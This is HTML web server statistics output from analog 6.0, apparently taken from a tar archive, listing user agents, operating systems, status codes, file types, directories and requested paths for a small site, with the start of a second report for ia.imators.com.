GPTBot/1.2; +https://openai.com/gptbot)</td></tr> <tr><td class="R">37</td><td class="P">37</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36</td></tr> <tr><td class="R">36</td><td class="P">36</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36</td></tr> <tr><td class="R">32</td><td class="P">32</td><td class="xl">Mozilla/5.0 (compatible)</td></tr> <tr><td class="R">30</td><td class="P">30</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43</td></tr> <tr><td class="R">25</td><td class="P">25</td><td class="xl">Mozilla/5.0 \\(Windows NT 10.0\\; Win64\\; x64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/100.0.4896.60 Safari/537.36</td></tr> <tr><td class="R">29</td><td class="P">25</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">22</td><td class="P">22</td><td class="xl">Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0</td></tr> <tr><td class="R">21</td><td class="P">21</td><td class="xl">Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)</td></tr> <tr><td class="R">20</td><td class="P">20</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">17</td><td class="P">17</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr> <tr><td class="R">16</td><td class="P">16</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">14</td><td class="P">14</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36</td></tr> <tr><td class="R">13</td><td class="P">13</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">13</td><td class="P">13</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">12</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity</td></tr> <tr><td class="R">47</td><td class="P">10</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36</td></tr> <tr><td class="R">16</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.4a) Gecko/20030401</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 zgrab/0.x</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 (scanner.ducks.party)</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36</td></tr> <tr><td class="R">30</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Linux; U; Android 8.1.0; zh-cn; MI 8 Build/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 Mobile Safari/537.36</td></tr> <tr><td class="R">22</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36</td></tr> <tr><td class="R">14</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (compatible; wpbot/1.1; +https://forms.gle/ajBaxygz9jSR8p8G9)</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0</td></tr> <tr><td class="R">18</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">curl/7.61.1</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36</td></tr> <tr><td class="R">28</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0</td></tr> <tr><td class="R">14</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36</td></tr> <tr><td class="R">466</td><td class="P">203</td><td class="xl">[not listed: 197 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">730</td><td class="P">457</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">678</td><td class="P">427</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">18</td><td class="P">18</td><td class="xl"> Safari/535</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">20</td><td class="P">7</td><td class="xl"> Safari/604</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">3</td><td class="xl"> Safari/605</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">2</td><td class="xl"> Safari/534</td></tr> <tr><td class="N">2</td><td class="R">293</td><td class="P">228</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">79</td><td class="P">66</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">28</td><td class="P">24</td><td class="xl"> Firefox/120</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">6</td><td class="xl"> Firefox/122</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">6</td><td class="xl"> Firefox/137</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">6</td><td class="xl"> Firefox/139</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">5</td><td class="xl"> Firefox/126</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">5</td><td class="xl"> Firefox/136</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">3</td><td class="P">3</td><td class="xl"> Firefox/130</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/62</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/83</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/134</td></tr> <tr><td class="N">4</td><td class="R">43</td><td class="P">43</td><td class="xl">Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">43</td><td class="P">43</td><td class="xl"> Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains</td></tr> <tr><td class="N">5</td><td class="R">59</td><td class="P">39</td><td class="xl">Mozilla</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">17</td><td class="P">12</td><td class="xl"> Mozilla/1</td></tr> <tr><td class="N">6</td><td class="R">29</td><td class="P">25</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">29</td><td class="P">25</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">7</td><td class="R">10</td><td class="P">10</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https:</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">10</td><td class="P">10</td><td class="xl"> Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex</td></tr> <tr><td class="N">8</td><td class="R">10</td><td class="P">10</td><td class="xl">curl</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">10</td><td class="P">10</td><td class="xl"> curl/7</td></tr> <tr><td class="N">9</td><td class="R">4</td><td class="P">4</td><td class="xl">WanScannerBot</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> WanScannerBot/1</td></tr> <tr><td class="N">10</td><td class="R">5</td><td class="P">3</td><td class="xl">python-requests</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">3</td><td class="xl"> python-requests/2</td></tr> <tr><td class="N">11</td><td class="R">5</td><td class="P">3</td><td class="xl">MSIE</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> MSIE/7</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">1</td><td class="xl"> MSIE/9</td></tr> <tr><td class="N">12</td><td class="R">14</td><td class="P">2</td><td class="xl">python-httpx</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">14</td><td class="P">2</td><td class="xl"> python-httpx/0</td></tr> <tr><td class="N">13</td><td class="R">4</td><td class="P">1</td><td class="xl">googlebot</td></tr> <tr><td class="N">14</td><td class="R">1</td><td class="P">1</td><td class="xl">BlackBerry8320</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> BlackBerry8320/4</td></tr> <tr><td class="N"> </td><td class="R">28</td><td class="P">0</td><td class="xl">[not listed: 9 browsers]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">452</td><td class="P">340</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">440</td><td class="P">282</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">378</td><td class="P">258</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">55</td><td class="P">22</td><td class="xl"> Unknown Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Windows 2000</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">1</td><td class="xl"> Windows XP</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">0</td><td class="xl"> Windows CE</td></tr> <tr><td class="N">3</td><td class="R">234</td><td class="P">146</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">233</td><td class="P">146</td><td class="xl"> Linux</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">0</td><td class="xl"> Other Unix</td></tr> <tr><td class="N">4</td><td class="R">187</td><td class="P">123</td><td class="xl">Macintosh</td></tr> <tr><td class="N">5</td><td class="R">1</td><td class="P">1</td><td class="xl">Symbian OS</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">1413</td><td class="xl">200 OK</td></tr> <tr><td class="R">1</td><td class="xl">301 Document moved permanently</td></tr> <tr><td class="R">5</td><td class="xl">302 Document found elsewhere</td></tr> <tr><td class="R">166</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">3504</td><td class="xl">404 Document not found</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">23</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">62</td><td class="b"> 0.31%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">823</td><td class="b">28.38%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">504</td><td class="b">55.16%</td></tr> <tr><td class="x"> 10kB-100kB</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x">100kB- 1MB</td><td class="R">1</td><td class="b">16.15%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">990</td><td class="b">48.50%</td><td class="xl">[directories]</td></tr> <tr><td class="R">259</td><td class="b">25.72%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">8</td><td class="b">19.88%</td><td class="xl">.php [PHP]</td></tr> <tr><td class="R">52</td><td class="b"> 4.11%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">41</td><td class="b"> 1.00%</td><td class="xl">.svg</td></tr> <tr><td class="R">1</td><td class="b"> 0.48%</td><td class="xl">.cgi [CGI scripts]</td></tr> <tr><td class="R">62</td><td class="b"> 0.31%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">970</td><td class="b">67.26%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">352</td><td class="b">30.83%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">90</td><td class="b"> 1.43%</td><td class="xl">/.well-known/</td></tr> <tr><td class="R">1</td><td class="b"> 0.48%</td><td class="xl">/cgi-sys/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">962</td><td class="b">47.38%</td><td class="D">Oct/31/25 1:58 AM</td><td class="xl"><a href="/">/</a></td></tr> <tr class="sub level2"><td class="R">83</td><td class="b"> 3.55%</td><td class="D">Sep/ 5/25 12:14 PM</td><td class="xl"> <a href="/?192.42.116.194">/?192.42.116.194</a></td></tr> <tr class="sub level2"><td class="R">28</td><td class="b"> 1.94%</td><td class="D">Jun/27/24 12:00 AM</td><td class="xl"> <a href="/?195.211.77.140">/?195.211.77.140</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b"> 1.54%</td><td class="D">Sep/15/24 3:19 PM</td><td class="xl"> <a href="/?198.235.24.138">/?198.235.24.138</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b"> 1.42%</td><td class="D">Oct/27/25 2:12 PM</td><td class="xl"> <a href="/?147.93.158.41">/?147.93.158.41</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b"> 1.01%</td><td class="D">Mar/ 1/25 3:30 PM</td><td class="xl"> <a href="/?104.166.80.124">/?104.166.80.124</a></td></tr> <tr class="sub level2"><td class="R">23</td><td class="b"> 1.19%</td><td class="D">Feb/28/25 11:54 PM</td><td class="xl"> <a href="/?45.148.10.172">/?45.148.10.172</a></td></tr> <tr class="sub level2"><td class="R">12</td><td class="b"> 0.44%</td><td class="D">Sep/16/25 1:04 AM</td><td class="xl"> <a href="/?rest_route=/wp/v2/users/">/?rest_route=/wp/v2/users/</a></td></tr> <tr class="sub level2"><td class="R">12</td><td class="b"> 0.71%</td><td class="D">Jul/26/24 5:12 AM</td><td class="xl"> <a href="/?199.45.154.72">/?199.45.154.72</a></td></tr> <tr><td class="R">136</td><td class="b">22.95%</td><td class="D">Oct/26/25 4:52 AM</td><td class="xl">/_autoindex/assets/js/tablesort.js</td></tr> <tr><td class="R">123</td><td class="b"> 2.77%</td><td class="D">Oct/28/25 9:46 PM</td><td class="xl">/_autoindex/assets/js/tablesort.number.js</td></tr> <tr><td class="R">52</td><td class="b"> 4.11%</td><td class="D">Oct/26/25 4:52 AM</td><td class="xl">/_autoindex/assets/css/autoindex.css</td></tr> <tr><td class="R">37</td><td class="b"> 0.91%</td><td class="D">Sep/16/25 6:20 AM</td><td class="xl">/_autoindex/assets/icons/folder-fill.svg</td></tr> <tr><td class="R">103</td><td class="b">21.88%</td><td class="D">Sep/16/25 1:03 AM</td><td class="xl">[not listed: 33 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> 1.html 0000644 00000140340 15114762025 0005577 0 ustar 00 <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for ia.imators.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://ia.imators.com/">ia.imators.com</a></h1> <p class="analysisspan">Program started on Tue, Jan 28 2025 at 1:11 PM. <br />Analyzed requests from Wed, May 15 2024 at 10:34 PM to Tue, Jan 28 2025 at 5:12 AM (257.28 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Jan 28 2025 at 1:11 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 737 (14) <br /><span class="gensumtitle">Average successful requests per day:</span> 2 (1) <br /><span class="gensumtitle">Successful requests for pages:</span> 496 (12) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 1 (1) <br /><span class="gensumtitle">Failed requests:</span> 551 (21) <br /><span class="gensumtitle">Redirected requests:</span> 2 (0) <br /><span class="gensumtitle">Distinct files requested:</span> 33 (158) <br /><span class="gensumtitle">Distinct hosts served:</span> 359 (416) <br /><span class="gensumtitle">Data transferred:</span> 692.33 kilobytes (11.16 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 2.69 kilobytes (1.59 kilobytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 3 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">May 2024</td><td class="R">162</td><td class="P">101</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Jun 2024</td><td class="R">69</td><td class="P">63</td><td class="bar"><img src="/images/barb16.png" 